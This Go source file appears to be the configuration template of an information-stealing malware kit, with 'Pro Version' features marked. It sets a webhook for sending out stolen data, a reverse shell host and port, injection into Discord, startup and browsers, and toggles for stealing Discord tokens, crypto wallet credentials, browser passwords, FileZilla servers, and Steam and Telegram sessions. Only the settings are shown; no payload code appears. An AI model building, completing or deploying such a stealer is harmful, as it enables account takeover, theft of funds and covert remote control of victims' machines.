// DO NOT EDIT THIS FILE!

package main

// webhook related
var webhookUrl = ""
var webhookEncrypted = false
var hitMessage = ""

// embed color (0-16777215 are valid)
var embedColor = 16777215

// shell related
var reverseShell = false
var reverseShellHost = ""
var reverseShellPort = ""

// injection related
var injectIntoDiscord = false // In Development (Releasing Soon)
var injectIntoStartup = false // Pro Version
var injectIntoBrowsers = false // Pro Version

// enable/disable heavy-load stealing functions (can increase program runtime considerably)
var getDiscordTokens = false
var getWalletCredentials = false
var getBrowserCredentials = false // Pro Version
var getFileZillaServers = false // Pro Version
var getSteamSession = false // Pro Version
var getTelegramSession = false // Pro Version

var getInstalledSoftware = false
var getNetworkConnections = false
var getScrapedFiles = false